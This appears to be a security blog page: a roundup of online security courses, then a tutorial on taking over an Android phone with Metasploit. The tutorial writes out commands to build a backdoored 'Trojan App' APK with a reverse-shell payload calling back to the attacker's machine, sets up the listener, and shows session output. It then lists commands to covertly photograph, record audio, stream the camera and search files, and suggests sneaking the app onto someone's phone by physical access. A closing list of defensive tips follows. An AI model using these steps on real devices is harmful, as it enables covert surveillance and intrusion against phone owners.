Sunday roundup for the 3rd of April 2016. Please contact me if you would like to be featured on security-sleuth.com.Read More
It’s been a while since I have put together an original post the main reason for this is I have been feeding my desire to keep learning and growing. Good news for all of you I have spent on my time embedded in some InfoSec focussed learning. So now it’s time to share a few of the things I learnt with you all!
In a nutshell: I previously Interviewed the man behind this course Mike Hicks here. This would have to be one of the best courses on teaching secure coding available on the web instead of teaching concepts with some very small examples this course goes miles further by allowing you to reverse engineer and exploit code which isn’t written securely. Not only do you look at C code, you also delve into all of the common Software security issues like SQL injection and fuzz testing this course will definitely take your coding and security skills to the next level.
Find out more: https://www.coursera.org/course/softwaresec
In a nutshell: This course is comprised of many units although it’s not a security focused course it’s an interesting dynamic the lecturer has some professional developers come in and teach swift and the guys are fantastic and give some really good practical examples of using swift code.
I primarily took this because I was interested in learning Swift and running through some Fuzz testing with Swift code – eventually I will post something on this.
Also in light of recent events this week (a 1 million dollar iOS exploit bounty being claimed) the more you know about securing your iOS apps the better.
Find out more: https://www.coursera.org/specializations/app-development
Malicious software and its underground economy
In a nutshell: This course is a slightly different take on Computer Security instead of giving you a walkthrough on how to design and build systems it looks at Malicious software and tries to define its intents and how the people behind malware a) try to profit from it and b) how to determine how much they actually made from malware. The course also gives a great rundown of IDA Pro and how to use it effectively when analysing malware and other software.
Find out more: https://www.coursera.org/course/malsoftware
IT Masters Forensics short course
In a nutshell: This is a bit sized forensics course taken from one of the popular information security masters programs by Charles Sturt University in Australia. The course spans 5 weeks where the lecturer a renowned Forensics Expert goes through the basics of Computer Forensics Investigations and touched not only on the technical aspect but a lot the Legal and administrative aspects – highly recommend this to anybody who is thinking about a career in computer forensics.
The Complete Hacking Course: Go from Beginner to Advanced!
In a nutshell: If you’re looking to start a career in penetration testing this is the ultimate starting place. The course contains over 100 lectures covering multiple aspects of penetration testing not only will you delve into subjects like programming but it will walk you through pretty much every facet of penetration testing weather its cracking wifi or performing DOS attacks. This course will give you everything you need to start you on the path to being a security expert.
Find out more: https://www.udemy.com/penetration-testing/
As always please let me know if found this article useful or if you didn't, Don’t forget to like this post or leave a comment below to let me know another area you would be interested in reading about. Thanks for your continued support! Until next time!
In the interest of full disclosure this article technically should be called “things you can do on android with meterpreter”
So I found myself with some free time this weekend, so I decided I would put together a quick post on using one of the most widely used penetration testing frameworks, Metasploit. A few months ago I started looking into Metasploit and began teaching myself the basics, what struck me most from my initial observations and tinkering with Metasploit is how incredibly easy it was to use, which is great for Security professionals who are starting out or just people who are interested in the field.
Often we read about security breaches and cybercrime in the news, in 99.95% of the articles on these topics take a high level approach (there are a wide range of reasons for why articles take this approach which I won’t delve into, but feel free to leave a comment on why you think this happens) unfortunately this makes it hard for IT Pros to figure out exactly what happened and how they can defend against these threats, fortunately tools like Metasploit help to bridge the knowledge gap and are leading us on the way to being a little more secure.
So what is Metasploit?
As I briefly glossed over earlier Metasploit is a popular penetration testing framework and penetration testing toolkit, so what does that mean you may ask? In a nutshell Metasploit is a powerful tool which has thousands of prebuilt exploits (programs which can take advantage of security vulnerabilities to give you access to or control over a machine which you would not normally have control over). Metasploit also gives you the ability to write your own exploits for security vulnerabilities and execute them against machines.
For those of you who aren’t Technical and don’t really understand what the above paragraph means I’ll summarise it this way: Metasploit is a tool which you can use to hack Computers, tablets, phones and other devices.
So without further ado ill jump right in to explaining what you can do with Metasploit on an Android Phone.
What I used
For This post I used the following devices and tools:
- A (non-rooted) Samsung Galaxy S3 with a 4GB microSD card connected to my wireless network
- An 8GB SanDisk Bootable Flash drive with Kali Linux installed (Metasploit is installed by default on Kali Linux)
- A PC with a Wireless card connected to my wireless network.
As a quick reminder I owned all of the devices used in this example. If you were to replicate this example with devices you do not own it may be a criminal offence.
This should be fairly straight forward:
- Ensure that the android phone is connected to a local area network and make sure you know its IP address.
- Plug your bootable flash drive into a PC which is powered off and power it on (you may need to make sure that your PC checks for bootable media before booting off the hard disk.
- Once the PC has booted into Kali Linux make sure it’s connected to the same local area network as the Android device.
A Quick note here this example carries out this activity on a single network and this example can be modified to work across multiple networks.
So how do you get an meterpreter session on and android device?
This by far the part where you can be most creative, the resource links show a few creative ways to do this using multiple Metasploit exploits. I don't want to give to much away so the method I used was to sneak it onto somebody’s phone by uploading it to a microSD card and install it while you have physical access to their phone, you could however hire Ninjas to take care of this for you.
The method I chose (for simplicity)
For simplicities sake I chose option 5, here’s how I carried it out:
First you have to create a backdoor “Trojan App” to exploit android you can do this by running the following command at the terminal:
root@kali:~# sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.21 lport=4444 R > app.apk
The LHOST address will be the attackers IP address (your Kali Linux machines IP).
Next I copied the file onto a microSD card and installed it (note here that you have to have install from unknown sources enabled)
Now on my PC booted up with Kali Linux I ran the following commands:
Use the multi-handler exploit:
msf > use exploit/multi/handler
Set the reverse TCP android payload:
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
Set the local and remote hosts:
msf exploit(handler) > set lhost 192.168.0.21
lhost => 192.168.0.21
msf exploit(handler) > set rhost 192.168.0.17
rhost => 192.168.0.17
Set the local port:
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.0.21:4444
[*] Starting the payload handler...
[*] Sending stage (40248 bytes) to 192.168.0.28
[*] Meterpreter session 1 opened (192.168.0.21:4444 -> 192.168.0.28:59439) at 2014-08-03 17:54:17 +0000
Now that you have a session open make sure the user clicks on the app called MainActivity and then you can begin with meterpreter.
Creepy / cool things you can do with your meterpreter session
So after you have an meterpreter session open you basically have free reign to do whatever you like on the device so ill show some of the most creepy / cool examples:
View running processes
I often start by printing the working directory:
meterpreter > ps
Printing the Working directory
I often start by printing the working directory:
meterpreter > pwd
Search for a file
Run the “search” command:
meterpreter > search –f *.mp3
No files matching your search were found.
Take photos using the devices cameras
First list all the webcams that are available:
meterpreter > webcam_list
1: Back Camera
2: Front Camera
You can now run the webcam_snap command, by default it takes a photo using the first camera:
meterpreter > webcam_snap
[+] Got frame
Webcam shot saved to: /root/liRDOzXS.jpeg
If you want to take a photo using the second camera
meterpreter > webcam_snap –I 2
[+] Got frame
Webcam shot saved to: /root/oFsDkLjd.jpeg
The command output will usually tell you what the file has been saved as
Record sound with the microphone
Run the record_mic command:
meterpreter > record_mic 5
Audio saved to: /root/JxltdUyn.wav
I didn't have much luck with this one it seemed to produce files that were not playable, but that could be something to do with the PC I was using.
Viewing a video stream from the devices camera
Run the following command to stream from the second camera:
meterpreter > webcam_stream –I 2
[*] Preparing player…
[*] Opening player at: LCInGfYj.html
How you can protect against this
- Only install apps and software from the google play store.
- Run some sort of (trusted) 3rd party security software and regularly audit your phone.
- Make sure you don’t have enable installs from unknown sources enabled.
- Keep your phone in your possession at all times.
- Avoid opening any suspicious links in emails or text messages.
Please let me know if found this article useful or if you didn't, leave a comment below to let me know another area you would be interested in reading posts about.